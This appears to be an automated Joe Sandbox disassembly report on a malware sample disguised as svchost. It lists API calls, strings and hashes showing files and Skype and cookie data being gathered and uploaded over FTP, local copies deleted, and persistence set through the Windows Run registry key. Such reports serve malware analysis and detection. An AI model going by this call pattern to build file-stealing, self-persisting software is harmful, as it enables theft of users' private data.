      • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$fprintf$A?$basic_string@$File$??0?$basic_string@??1?$basic_string@?erase@?$basic_string@?find@?$basic_string@V12@fclosefopen$Deletememsetsprintf$??4?$basic_string@V01@feoffgetc
      • String ID: $ $%s$</info>$</info>$<info>$<info>$<info>$end = %2d.%02d.%04d - %2d:%02d$name = %s $nf2$start = %2d.%02d.%04d - %2d:%02d$start=%d$start=%d$upload cookie = %d $upload skype = %d $v_%d\info.txt$version = %d
      • API String ID: 2882178117-1130591389
      • Opcode ID: 96cb2d77533408d88f7309076ce55bfa83f0dd880aac6cd8253ece12daab6c33
      • Instruction ID: 0614523a3f57a7131160885ae83b0c8c0d343c15cbb1b179775ef8abed40f4de
      • Opcode Fuzzy Hash: 96cb2d77533408d88f7309076ce55bfa83f0dd880aac6cd8253ece12daab6c33
      • Instruction Fuzzy Hash: 11D1B071144B10AFD318AB65DC49EBB77EBEB85B01F00D409F54E921A1EBB85D84CB72

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 563 6728a7-6728ae 564 6728b0-6728b8 563->564 565 6728be-6728c6 564->565 566 672a09-672a1a FindNextFileA 564->566 565->566 567 6728cc-6728d4 565->567 566->564 568 672a20-672a35 FindNextFileA 566->568 567->566 569 6728da-672a06 ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z * 3 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 3 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z * 2 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z call 6712f0 567->569 570 672690-672698 568->570 571 672a3b-672b01 FindClose ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z * 2 sprintf call 671260 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z FtpCreateDirectoryA ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z call 6712f0 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z FtpCreateDirectoryA 568->571 569->566 570->568 573 67269e-67273b ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z * 2 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 2 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z FindFirstFileA 570->573 587 672b07-672b10 571->587 588 6734e0-67355a ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 4 call 674bfc 571->588 576 672741-672749 573->576 577 67288e-67289f FindNextFileA 573->577 576->577 579 67274f-672757 576->579 577->568 581 6728a5 577->581 579->577 582 67275d-67288b ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z * 3 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 3 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z * 2 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z call 6712f0 579->582 581->564 582->577 589 672b18-672b29 587->589 591 672c93-672cbb ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z fopen 589->591 592 672b2f-672b9f ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z * 3 sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 589->592 596 672cc1-672d1c ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z * 2 sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 591->596 597 67334f-673367 591->597 594 672bd4-672c8e ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z FtpCreateDirectoryA ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z call 6712f0 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z call 6712f0 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z * 2 FtpPutFileA 592->594 595 672ba1-672bd2 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 592->595 619 67333d-67334b ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ 594->619 595->594 595->595 601 672d53-672dff ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 2 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z fopen 596->601 602 672d1e 596->602 599 672b12 597->599 600 67336d-67336f 597->600 599->589 600->588 604 673375-673394 memset 600->604 606 672e01-672e16 fgetc 601->606 605 672d20-672d51 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 602->605 608 673396 604->608 609 6733be-67342c ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z call 6712f0 RegOpenKeyExA RegSetValueExA RegCloseKey 604->609 605->601 605->605 610 672e27-672e36 606->610 611 672e18-672e24 fputc 606->611 613 6733a0-6733bc ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 608->613 609->588 624 673432-6734da ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z memset ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z CreateProcessA ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ 609->624 615 672fa6-672fa9 610->615 616 672e3c-672ebf ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z call 6712f0 fclose ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z * 2 sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 610->616 611->610 613->609 613->613 615->606 618 672faf-672fcd fclose * 2 615->618 625 672ef4-672fa3 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 2 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z fopen 616->625 626 672ec1-672ef2 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 616->626 622 673336 618->622 623 672fd3-67304e ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z * 2 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z * 2 sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 618->623 619->597 622->619 627 673083-673171 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 2 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z call 6712f0 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z * 2 sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 623->627 628 673050-673081 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 623->628 624->588 625->615 626->625 626->626 631 6731a6-673247 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z FtpCreateDirectoryA ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z * 3 sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 627->631 632 673173-6731a4 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 627->632 628->627 628->628 633 673283-673330 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z call 6712f0 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z * 2 FtpPutFileA ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z DeleteFileA ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 2 631->633 634 673249 631->634 632->631 632->632 633->622 633->623 636 673250-673281 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 634->636 636->633 636->636
      APIs
      • ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP90(?,?,?), ref: 006728F2
      • ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP90(?,?,?,00000000,00676378), ref: 0067290A
      • ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP90(?,00000000,?,?,?,?,00000000,00676378), ref: 00672924
      • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP90(00000000), ref: 00672947
      • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 0067295B
      • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 00672970
      • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 00672985
      • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP90(?), ref: 006729A8
      • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP90(?), ref: 006729CB
      • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP90(?), ref: 006729FB
        • Part of subcall function 006712F0: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP90(?,AED9119B,00000000,00675699,000000FF,00672550,?,?,?,AED9119B), ref: 00671322
        • Part of subcall function 006712F0: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP90(00676268,?,?,?,AED9119B), ref: 00671332
        • Part of subcall function 006712F0: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,?,?,?,AED9119B), ref: 0067133F
        • Part of subcall function 006712F0: SendMessageA.USER32(00010404,0000000C,00000000,00000000), ref: 00671351
        • Part of subcall function 006712F0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90(?,?,?,AED9119B), ref: 00671363
      • FindNextFileA.KERNEL32(00000000,?), ref: 00672A12
      • FindNextFileA.KERNEL32(?,?), ref: 00672A2D
      • FindClose.KERNEL32(00000000), ref: 00672A40
      • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP90( ), ref: 00672A52
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000), ref: 00672A67
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,v_%d,FFFFFFFF,00000000), ref: 00672A82
      • sprintf.MSVCR90 ref: 00672A89
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,?,?,00000000,?,?,?,00676224,?,?,00000000), ref: 00672AA2
      • FtpCreateDirectoryA.WININET(00000000,00000000), ref: 00672AB6
      • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP90(\skype,?,?,00000000,?,?,?,00676224,?,?,00000000), ref: 00672ABF
      • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP90(?), ref: 00672AD1
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000), ref: 00672AE3
      • FtpCreateDirectoryA.WININET(00000000,00000000), ref: 00672AF0
      • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP90( ), ref: 00672B3B
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90 ref: 00672B51
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,00000000), ref: 00672B61
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,%s\%s,00000000), ref: 00672B76
      • sprintf.MSVCR90 ref: 00672B7D
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(?,?,?,?,00000000), ref: 00672B96
      • ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z.MSVCP90(?,00000001,?,?,?,00000000), ref: 00672BB3
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(?,?,?,?,00000000), ref: 00672BC9
      • ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z.MSVCP90(?,00000001,?,?,?,00000000), ref: 00672BE6
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,?,?,?,00000000), ref: 00672BF5
      • FtpCreateDirectoryA.WININET(00000000,00000000), ref: 00672C03
      • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP90(00676378,?,?,?,00000000), ref: 00672C11
      • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP90(0067A5CC,?,?,?,00000000), ref: 00672C1F
      • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP90(-FF984454), ref: 00672C35
      • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP90(?), ref: 00672C4E
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,00000002,00000000), ref: 00672C69
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,00000000), ref: 00672C74
      • FtpPutFileA.WININET(00000000,00000000), ref: 00672C81
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,0067637C,?,?,?,?,?,?,?,?,?,?,?,?,00675924,000000FF), ref: 00672CA5
      • fopen.MSVCR90 ref: 00672CAC
      • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP90( ), ref: 00672CCD
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90 ref: 00672CDE
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,%d%s,00000000,00000000), ref: 00672CF3
      • sprintf.MSVCR90 ref: 00672CFA
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(?,?,?,?,00000000), ref: 00672D13
      • ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z.MSVCP90(?,00000001,?,?,?,00000000), ref: 00672D32
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(?,?,?,?,00000000), ref: 00672D48
      • ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z.MSVCP90(?,00000001,?,?,?,00000000), ref: 00672D65
      • ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP90(?,00678FCC,00676378,?,?,?,00000000), ref: 00672D7D
      • ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP90 ref: 00672D98
      • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP90 ref: 00672DB1
      • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 00672DC6
      • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 00672DDB
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,0067626C), ref: 00672DEF
      • fopen.MSVCR90 ref: 00672DF6
      • fgetc.MSVCR90 ref: 00672E06
      • fputc.MSVCR90 ref: 00672E1A
      • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 00673345
      • memset.MSVCR90 ref: 00673384
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000), ref: 006733A6
      • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP90(?), ref: 006733CF
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.2839141968.0000000000671000.00000020.00000001.01000000.00000004.sdmp, Offset: 00670000, based on PE: true
      • Associated: 00000001.00000002.2839102079.0000000000670000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.2839178588.0000000000676000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.2839211875.0000000000678000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.2839245070.000000000067C000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_670000_svchost.jbxd
      Similarity
      • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$A?$basic_string@$V01@$??0?$basic_string@$??1?$basic_string@V01@@$??$?D@1@@std@@D@2@@0@V?$basic_string@Y?$basic_string@$??4?$basic_string@?erase@?$basic_string@V10@V12@$CreateDirectoryFileFindsprintf$Nextfopen$CloseMessageSendV10@0@fgetcfputcmemset
      • String ID: $ $%s\%s$-$Skype$Software\Microsoft\Windows\CurrentVersion\Run\$\skype$a$m$v_%d
      • API String ID: 1465116219-3013915691
      • Opcode ID: 1a53786ce0d4c5363bf4e779de79ff35aef13a3d475cfcc69d1760a1cbddc005
      • Instruction ID: aeb47bc4745a562eae54584e5f277f29dba42ac773cf3a6f19cae8d305a4c62d
      • Opcode Fuzzy Hash: 1a53786ce0d4c5363bf4e779de79ff35aef13a3d475cfcc69d1760a1cbddc005
      • Instruction Fuzzy Hash: 0BE17C71108781DFD728DB64DD59BEE7BA6BB84705F00990CF58E832A1DB705988CF62
      APIs
      • fgetc.MSVCR90 ref: 00671E85
      • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP90(?), ref: 00671E9F
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,00000000), ref: 00671EAD
      • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z.MSVCP90(00000000), ref: 00671EB8
      • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z.MSVCP90(</info>,00000000), ref: 00671ED1
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000), ref: 00671EEC
      • fprintf.MSVCR90 ref: 00671EF9
      • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z.MSVCP90(<info>,00000000), ref: 00671F09
      • memset.MSVCR90 ref: 00671F25
      • feof.MSVCR90 ref: 00671F35
      • fprintf.MSVCR90 ref: 00671F58
      • fprintf.MSVCR90 ref: 00671F88
      • fprintf.MSVCR90 ref: 00671FC0
      • fprintf.MSVCR90 ref: 00671FF0
      • fprintf.MSVCR90 ref: 00672020
      • fprintf.MSVCR90 ref: 0067202B
      • fclose.MSVCR90 ref: 00672037
      • fclose.MSVCR90 ref: 0067203A
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,00000002,00000000), ref: 00672049
      • FtpPutFileA.WININET(00000000,nf2,00000000), ref: 0067205C
      • DeleteFileA.KERNEL32(nf2), ref: 00672067
      • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 00672079
      • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 0067208B
      • fopen.MSVCR90 ref: 006720A0
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000), ref: 006720B1
      • fprintf.MSVCR90 ref: 006720C4
      • fprintf.MSVCR90 ref: 006720D4
      • fprintf.MSVCR90 ref: 006720E4
      • fprintf.MSVCR90 ref: 006720F3
      • fprintf.MSVCR90 ref: 006720FB
      • fprintf.MSVCR90 ref: 00672109
      • fprintf.MSVCR90 ref: 0067213C
      • fprintf.MSVCR90 ref: 0067216C
      • fprintf.MSVCR90 ref: 00672174
      • fclose.MSVCR90 ref: 0067217A
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,00000002,00000000), ref: 0067218D
      • FtpPutFileA.WININET(00000000,006763D4,00000000), ref: 006721A0
      • DeleteFileA.KERNEL32(006763D4), ref: 006721AB
      • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 006721C0
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.2839141968.0000000000671000.00000020.00000001.01000000.00000004.sdmp, Offset: 00670000, based on PE: true
      • Associated: 00000001.00000002.2839102079.0000000000670000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.2839178588.0000000000676000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.2839211875.0000000000678000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.2839245070.000000000067C000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_670000_svchost.jbxd
      Similarity
      • API ID: fprintf$D@2@@std@@D@std@@U?$char_traits@V?$allocator@$A?$basic_string@$File$??1?$basic_string@?find@?$basic_string@fclose$Delete$??4?$basic_string@V01@feoffgetcfopenmemset
      • String ID: %s$</info>$<info>$nf2
      • API String ID: 1196744205-608960993
      • Opcode ID: bcaaa18e1407548a44accc76cecf9b06d131c89ab0c819b2996b75365760f455
      • Instruction ID: e3f02dc1863ff0edf748f749317b92217bc2aae7e7c2e3dba6122f5a41c888b8
      • Opcode Fuzzy Hash: bcaaa18e1407548a44accc76cecf9b06d131c89ab0c819b2996b75365760f455
      • Instruction Fuzzy Hash: 1231B230148701DFD728DB64DD09BEABBA6BB45705F40841DF54E821E0DB75A948CF63
      APIs
      • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP90 ref: 00671ACC
      • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP90(?), ref: 00671AE1
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,0067637C), ref: 00671AF5
      • fopen.MSVCR90 ref: 00671B02
